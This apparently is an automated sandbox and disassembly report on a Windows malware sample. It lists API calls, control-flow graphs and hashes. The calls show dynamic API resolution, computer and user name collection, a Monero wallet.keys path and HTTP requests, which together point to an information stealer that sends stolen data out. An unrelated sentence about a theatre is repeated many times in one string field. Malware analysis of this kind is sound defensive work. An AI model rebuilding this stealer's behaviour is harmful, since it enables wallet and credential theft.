                  • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                  • API String ID: 1542196881-2218711628
                  • Opcode ID: cf02b62878baa38ea0d13ee53d4c86ecd0114ad385026bce1a8091ff7849cfae
                  • Instruction ID: 45e27e05ff24efccd2a9e465eb3198e973364d857726ebb6da1889546063be10
                  • Opcode Fuzzy Hash: cf02b62878baa38ea0d13ee53d4c86ecd0114ad385026bce1a8091ff7849cfae
                  • Instruction Fuzzy Hash: 8B4158607E26957FC63CFBA4BD6EE9D7792DF4A720FD072C2EE0892290DBB095004525
                  Function 00B04880 Relevance: 28.5, APIs: 11, Strings: 5, Instructions: 479networkstringfileCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 801 b04880-b04942 call b1a7a0 call b047b0 call b1a740 * 5 InternetOpenA StrCmpCA 816 b04944 801->816 817 b0494b-b0494f 801->817 816->817 818 b04955-b04acd call b18b60 call b1a920 call b1a8a0 call b1a800 * 2 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a920 call b1a8a0 call b1a800 * 2 InternetConnectA 817->818 819 b04ecb-b04ef3 InternetCloseHandle call b1aad0 call b09ac0 817->819 818->819 905 b04ad3-b04ad7 818->905 829 b04f32-b04fa2 call b18990 * 2 call b1a7a0 call b1a800 * 8 819->829 830 b04ef5-b04f2d call b1a820 call b1a9b0 call b1a8a0 call b1a800 819->830 830->829 906 b04ae5 905->906 907 b04ad9-b04ae3 905->907 908 b04aef-b04b22 HttpOpenRequestA 906->908 907->908 909 b04b28-b04e28 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a9b0 call b1a8a0 call b1a800 call b1a920 call b1a8a0 call b1a800 call b1a740 call b1a920 * 2 call b1a8a0 call b1a800 * 2 call b1aad0 lstrlen call b1aad0 * 2 lstrlen call b1aad0 HttpSendRequestA 908->909 910 b04ebe-b04ec5 InternetCloseHandle 908->910 1021 b04e32-b04e5c InternetReadFile 909->1021 910->819 1022 b04e67-b04eb9 InternetCloseHandle call b1a800 1021->1022 1023 b04e5e-b04e65 1021->1023 1022->910 1023->1022 1024 b04e69-b04ea7 call b1a9b0 call b1a8a0 call b1a800 1023->1024 1024->1021
                  APIs
                    • Part of subcall function 00B1A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00B1A7E6
                    • Part of subcall function 00B047B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00B04839
                    • Part of subcall function 00B047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00B04849
                    • Part of subcall function 00B1A740: lstrcpy.KERNEL32(00B20E17,00000000), ref: 00B1A788
                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00B04915
                  • StrCmpCA.SHLWAPI(?,011FE3D0), ref: 00B0493A
                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00B04ABA
                  • lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00B20DDB,00000000,?,?,00000000,?,",00000000,?,011FE2A0), ref: 00B04DE8
                  • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00B04E04
                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00B04E18
                  • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00B04E49
                  • InternetCloseHandle.WININET(00000000), ref: 00B04EAD
                  • InternetCloseHandle.WININET(00000000), ref: 00B04EC5
                  • HttpOpenRequestA.WININET(00000000,011FE310,?,011FDD60,00000000,00000000,00400100,00000000), ref: 00B04B15
                    • Part of subcall function 00B1A9B0: lstrlen.KERNEL32(?,011F8B70,?,\Monero\wallet.keys,00B20E17), ref: 00B1A9C5
                    • Part of subcall function 00B1A9B0: lstrcpy.KERNEL32(00000000), ref: 00B1AA04
                    • Part of subcall function 00B1A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00B1AA12
                    • Part of subcall function 00B1A8A0: lstrcpy.KERNEL32(?,00B20E17), ref: 00B1A905
                    • Part of subcall function 00B1A920: lstrcpy.KERNEL32(00000000,?), ref: 00B1A972
                    • Part of subcall function 00B1A920: lstrcat.KERNEL32(00000000), ref: 00B1A982
                  • InternetCloseHandle.WININET(00000000), ref: 00B04ECF
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
                  • String ID: "$"$------$------$------
                  • API String ID: 460715078-2180234286
                  • Opcode ID: 97253faf97e1564aee4f09b9f38fe0212e9ede53ec6ee9667bfb7a5c3e664320
                  • Instruction ID: 60d27d86b05e1729802382781a0f120e0d3cea5ba5931ca6f9f4918756f65008
                  • Opcode Fuzzy Hash: 97253faf97e1564aee4f09b9f38fe0212e9ede53ec6ee9667bfb7a5c3e664320
                  • Instruction Fuzzy Hash: 1912DD71911218AADB15EB94DD92FEEB7B8AF15310F9041D9B10672091EF703F8ACF62
                  Function 00B178E0 Relevance: 4.5, APIs: 3, Instructions: 40memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00B17910
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17917
                  • GetComputerNameA.KERNEL32(?,00000104), ref: 00B1792F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateComputerNameProcess
                  • String ID:
                  • API String ID: 1664310425-0
                  • Opcode ID: 78e61cba5273c0dd315b1b518f76e43ec4965489d30f9420de8f7d5d5eb2e56d
                  • Instruction ID: 4fdcde233d229c27a1f93686157a9ec35a959a7add653fe9d109370e4663810c
                  • Opcode Fuzzy Hash: 78e61cba5273c0dd315b1b518f76e43ec4965489d30f9420de8f7d5d5eb2e56d
                  • Instruction Fuzzy Hash: 3B0186B1948304EBC700DF98DD45BAABBF8F705B51F50429AF545E3380C77459448BA1
                  Function 00B17850 Relevance: 4.5, APIs: 3, Instructions: 36memoryCOMMON
                  Download Yara Rule
                  APIs
                  • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00B011B7), ref: 00B17880
                  • RtlAllocateHeap.NTDLL(00000000), ref: 00B17887
                  • GetUserNameA.ADVAPI32(00000104,00000104), ref: 00B1789F
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: Heap$AllocateNameProcessUser
                  • String ID:
                  • API String ID: 1296208442-0
                  • Opcode ID: 484639f991f3da8d8e4f6491d035fac77e757022a923f2707c62d8338fc05b0c
                  • Instruction ID: c1d989c2e21ba4308b09c6f2168c237c350911e0ffb61230ab1c57e362e9cd16
                  • Opcode Fuzzy Hash: 484639f991f3da8d8e4f6491d035fac77e757022a923f2707c62d8338fc05b0c
                  • Instruction Fuzzy Hash: F1F04FB5984208ABC710DF99DD49BAEBBF8EB05711F10025AFA05E3780C77419448BA1
                  Function 00B01160 Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                  Download Yara Rule
                  APIs
                  Memory Dump Source
                  • Source File: 00000000.00000002.2101537520.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                  • Associated: 00000000.00000002.2101521674.0000000000B00000.00000004.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BB1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BBD000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000BE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101537520.0000000000D4A000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000D5E000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000EF1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FCF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FF3000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.0000000000FFF000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2101684232.000000000100D000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102032109.000000000100E000.00000080.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102161606.00000000011B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                  • Associated: 00000000.00000002.2102176800.00000000011B2000.00000080.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_b00000_file.jbxd
                  Yara matches
                  Similarity
                  • API ID: ExitInfoProcessSystem
                  • String ID:
                  • API String ID: 752954902-0
                  • Opcode ID: 6c1fb9e9fb35f116b5be9b2f958a9c025fae1272e3f861a2b9c7b01b15f85e15
                  • Instruction ID: 4f0cdea0ca4a583753cc5441e2f85260b4a9f8644319d93c922a160fc0d865d7
                  • Opcode Fuzzy Hash: 6c1fb9e9fb35f116b5be9b2f958a9c025fae1272e3f861a2b9c7b01b15f85e15
                  • Instruction Fuzzy Hash: F0D05E7894030CDBCB14DFE4D8496DDBBB8FB09311F000594E905B2340EA306481CAB6
                  Function 00B19C10 Relevance: 200.2, APIs: 112, Strings: 2, Instructions: 684libraryloaderCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
                  control_flow_graph 633 b19c10-b19c1a 634 b19c20-b1a031 GetProcAddress * 43 633->634 635 b1a036-b1a0ca LoadLibraryA * 8 633->635 634->635 636 b1a146-b1a14d 635->636 637 b1a0cc-b1a141 GetProcAddress * 5 635->637 638 b1a153-b1a211 GetProcAddress * 8 636->638 639 b1a216-b1a21d 636->639 637->636 638->639 640 b1a298-b1a29f 639->640 641 b1a21f-b1a293 GetProcAddress * 5 639->641 642 b1a2a5-b1a332 GetProcAddress * 6 640->642 643 b1a337-b1a33e 640->643 641->640 642->643 644 b1a344-b1a41a GetProcAddress * 9 643->644 645 b1a41f-b1a426 643->645 644->645 646 b1a4a2-b1a4a9 645->646 647 b1a428-b1a49d GetProcAddress * 5 645->647 648 b1a4ab-b1a4d7 GetProcAddress * 2 646->648 649 b1a4dc-b1a4e3 646->649 647->646 648->649 650 b1a515-b1a51c 649->650 651 b1a4e5-b1a510 GetProcAddress * 2 649->651 652 b1a612-b1a619 650->652 653 b1a522-b1a60d GetProcAddress * 10 650->653 651->650 654 b1a61b-b1a678 GetProcAddress * 4 652->654 655 b1a67d-b1a684 652->655 653->652 654->655 656 b1a686-b1a699 GetProcAddress 655->656 657 b1a69e-b1a6a5 655->657 656->657 658 b1a6a7-b1a703 GetProcAddress * 4 657->658 659 b1a708-b1a709 657->659 658->659
                  APIs
                  • GetProcAddress.KERNEL32(75900000,011E64E0), ref: 00B19C2D
                  • GetProcAddress.KERNEL32(75900000,011E6600), ref: 00B19C45
                  • GetProcAddress.KERNEL32(75900000,011F8D00), ref: 00B19C5E
                  • GetProcAddress.KERNEL32(75900000,011F8D18), ref: 00B19C76
                  • GetProcAddress.KERNEL32(75900000,011FCF48), ref: 00B19C8E
                  • GetProcAddress.KERNEL32(75900000,011FCEE8), ref: 00B19CA7
                  • GetProcAddress.KERNEL32(75900000,011EAFC8), ref: 00B19CBF
                  • GetProcAddress.KERNEL32(75900000,011FCFC0), ref: 00B19CD7
                  • GetProcAddress.KERNEL32(75900000,011FCE10), ref: 00B19CF0
                  • GetProcAddress.KERNEL32(75900000,011FCF00), ref: 00B19D08
                  • GetProcAddress.KERNEL32(75900000,011FCF30), ref: 00B19D20
                  • GetProcAddress.KERNEL32(75900000,011E6560), ref: 00B19D39
                  • GetProcAddress.KERNEL32(75900000,011E6620), ref: 00B19D51
                  • GetProcAddress.KERNEL32(75900000,011E6280), ref: 00B19D69
                  • GetProcAddress.KERNEL32(75900000,011E63A0), ref: 00B19D82
                  • GetProcAddress.KERNEL32(75900000,011FCF60), ref: 00B19D9A
                  • GetProcAddress.KERNEL32(75900000,011FCE70), ref: 00B19DB2
                  • GetProcAddress.KERNEL32(75900000,011EAFF0), ref: 00B19DCB
                  • GetProcAddress.KERNEL32(75900000,011E62C0), ref: 00B19DE3
                  • GetProcAddress.KERNEL32(75900000,011FCEB8), ref: 00B19DFB
                  • GetProcAddress.KERNEL32(75900000,011FCF78), ref: 00B19E14
                  • GetProcAddress.KERNEL32(75900000,011FCE28), ref: 00B19E2C
                  • GetProcAddress.KERNEL32(75900000,011FCEA0), ref: 00B19E44
                  • GetProcAddress.KERNEL32(75900000,011E62E0), ref: 00B19E5D
                  • GetProcAddress.KERNEL32(75900000,011FCE40), ref: 00B19E75
                  • GetProcAddress.KERNEL32(75900000,011FCF90), ref: 00B19E8D
                  • GetProcAddress.KERNEL32(75900000,011FCE88), ref: 00B19EA6
                  • GetProcAddress.KERNEL32(75900000,011FCED0), ref: 00B19EBE
                  • GetProcAddress.KERNEL32(75900000,011FCE58), ref: 00B19ED6
                  • GetProcAddress.KERNEL32(75900000,011FCF18), ref: 00B19EEF
                  • GetProcAddress.KERNEL32(75900000,011FCFA8), ref: 00B19F07
                  • GetProcAddress.KERNEL32(75900000,011FC810), ref: 00B19F1F
                  • GetProcAddress.KERNEL32(75900000,011FCAC8), ref: 00B19F38
                  • GetProcAddress.KERNEL32(75900000,011F9F38), ref: 00B19F50
                  • GetProcAddress.KERNEL32(75900000,011FC858), ref: 00B19F68
                  • GetProcAddress.KERNEL32(75900000,011FCAE0), ref: 00B19F81
                  • GetProcAddress.KERNEL32(75900000,011E6300), ref: 00B19F99
                  • GetProcAddress.KERNEL32(75900000,011FC948), ref: 00B19FB1
                  • GetProcAddress.KERNEL32(75900000,011E6360), ref: 00B19FCA
                  • GetProcAddress.KERNEL32(75900000,011FC990), ref: 00B19FE2
                  • GetProcAddress.KERNEL32(75900000,011FC930), ref: 00B19FFA
                  • GetProcAddress.KERNEL32(75900000,011E63E0), ref: 00B1A013
                  • GetProcAddress.KERNEL32(75900000,011E6460), ref: 00B1A02B
                  • LoadLibraryA.KERNEL32(011FC960,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A03D
                  • LoadLibraryA.KERNEL32(011FCA68,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A04E
                  • LoadLibraryA.KERNEL32(011FC870,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A060
                  • LoadLibraryA.KERNEL32(011FCA80,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A072
                  • LoadLibraryA.KERNEL32(011FCA20,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A083
                  • LoadLibraryA.KERNEL32(011FC9A8,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A095
                  • LoadLibraryA.KERNEL32(011FC840,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A0A7
                  • LoadLibraryA.KERNEL32(011FCAF8,?,00B15CA3,00B20AEB,?,?,?,?,?,?,?,?,?,?,00B20AEA,00B20AE3), ref: 00B1A0B8
                  • GetProcAddress.KERNEL32(75FD0000,011E6A20), ref: 00B1A0DA
                  • GetProcAddress.KERNEL32(75FD0000,011FC978), ref: 00B1A0F2
                  • GetProcAddress.KERNEL32(75FD0000,011F8940), ref: 00B1A10A
                  • GetProcAddress.KERNEL32(75FD0000,011FC9C0), ref: 00B1A123
                  • GetProcAddress.KERNEL32(75FD0000,011E68A0), ref: 00B1A13B
                  • GetProcAddress.KERNEL32(734B0000,011EB1D0), ref: 00B1A160
                  • GetProcAddress.KERNEL32(734B0000,011E6780), ref: 00B1A179
                  • GetProcAddress.KERNEL32(734B0000,011EB220), ref: 00B1A191
                  • GetProcAddress.KERNEL32(734B0000,011FC888), ref: 00B1A1A9
                  • GetProcAddress.KERNEL32(734B0000,011FCA98), ref: 00B1A1C2
                  • GetProcAddress.KERNEL32(734B0000,011E6940), ref: 00B1A1DA
                  • GetProcAddress.KERNEL32(734B0000,011E6860), ref: 00B1A1F2
                  • GetProcAddress.KERNEL32(734B0000,011FCA50), ref: 00B1A20B
                  • GetProcAddress.KERNEL32(763B0000,011E67E0), ref: 00B1A22C
                  • GetProcAddress.KERNEL32(763B0000,011E67A0), ref: 00B1A244
                  • GetProcAddress.KERNEL32(763B0000,011FC8A0), ref: 00B1A25D
                  • GetProcAddress.KERNEL32(763B0000,011FC828), ref: 00B1A275
                  • GetProcAddress.KERNEL32(763B0000,011E6800), ref: 00B1A28D
                  • GetProcAddress.KERNEL32(750F0000,011EB018), ref: 00B1A2B3
                  • GetProcAddress.KERNEL32(750F0000,011EB040), ref: 00B1A2CB
                  • GetProcAddress.KERNEL32(750F0000,011FC8B8), ref: 00B1A2E3
                  • GetProcAddress.KERNEL32(750F0000,011E6900), ref: 00B1A2FC
                  • GetProcAddress.KERNEL32(750F0000,011E6A00), ref: 00B1A314
                  • GetProcAddress.KERNEL32(750F0000,011EB1A8), ref: 00B1A32C
                  • GetProcAddress.KERNEL32(75A50000,011FC9D8), ref: 00B1A352
                  • GetProcAddress.KERNEL32(75A50000,011E68C0), ref: 00B1A36A
                  • GetProcAddress.KERNEL32(75A50000,011F8840), ref: 00B1A382
                  • GetProcAddress.KERNEL32(75A50000,011FCAB0), ref: 00B1A39B
                  • GetProcAddress.KERNEL32(75A50000,011FC8D0), ref: 00B1A3B3
                  • GetProcAddress.KERNEL32(75A50000,011E67C0), ref: 00B1A3CB
                  • GetProcAddress.KERNEL32(75A50000,011E69A0), ref: 00B1A3E4
                  • GetProcAddress.KERNEL32(75A50000,011FCA38), ref: 00B1A3FC
                  • GetProcAddress.KERNEL32(75A50000,011FC9F0), ref: 00B1A414
                  • GetProcAddress.KERNEL32(75070000,011E6960), ref: 00B1A436
                  • GetProcAddress.KERNEL32(75070000,011FC8E8), ref: 00B1A44E
                  • GetProcAddress.KERNEL32(75070000,011FCA08), ref: 00B1A466
                  • GetProcAddress.KERNEL32(75070000,011FC900), ref: 00B1A47F
                  • GetProcAddress.KERNEL32(75070000,011FC918), ref: 00B1A497
                  • GetProcAddress.KERNEL32(74E50000,011E6880), ref: 00B1A4B8
                  • GetProcAddress.KERNEL32(74E50000,011E6980), ref: 00B1A4D1
                  • GetProcAddress.KERNEL32(75320000,011E69C0), ref: 00B1A4F2
                  • GetProcAddress.KERNEL32(75320000,011FCC30), ref: 00B1A50A
                  • GetProcAddress.KERNEL32(6F060000,011E6820), ref: 00B1A530
                  • GetProcAddress.KERNEL32(6F060000,011E69E0), ref: 00B1A548
                  • GetProcAddress.KERNEL32(6F060000,011E66C0), ref: 00B1A560
                  • GetProcAddress.KERNEL32(6F060000,011FCD80), ref: 00B1A579
                  • GetProcAddress.KERNEL32(6F060000,011E6680), ref: 00B1A591
                  • GetProcAddress.KERNEL32(6F060000,011E6720), ref: 00B1A5A9
                  • GetProcAddress.KERNEL32(6F060000,011E6920), ref: 00B1A5C2
                  • GetProcAddress.KERNEL32(6F060000,011E68E0), ref: 00B1A5DA
                  • GetProcAddress.KERNEL32(6F060000,InternetSetOptionA), ref: 00B1A5F1
                  • GetProcAddress.KERNEL32(6F060000,HttpQueryInfoA), ref: 00B1A607
                  • GetProcAddress.KERNEL32(74E00000,011FCB70), ref: 00B1A629
                  • GetProcAddress.KERNEL32(74E00000,011F8800), ref: 00B1A641
                  • GetProcAddress.KERNEL32(74E00000,011FCBD0), ref: 00B1A659
                  • GetProcAddress.KERNEL32(74E00000,011FCD08), ref: 00B1A672
                  • GetProcAddress.KERNEL32(74DF0000,011E66A0), ref: 00B1A693
                  • GetProcAddress.KERNEL32(6E320000,011FCC48), ref: 00B1A6B4
                  • GetProcAddress.KERNEL32(6E320000,011E66E0), ref: 00B1A6CD
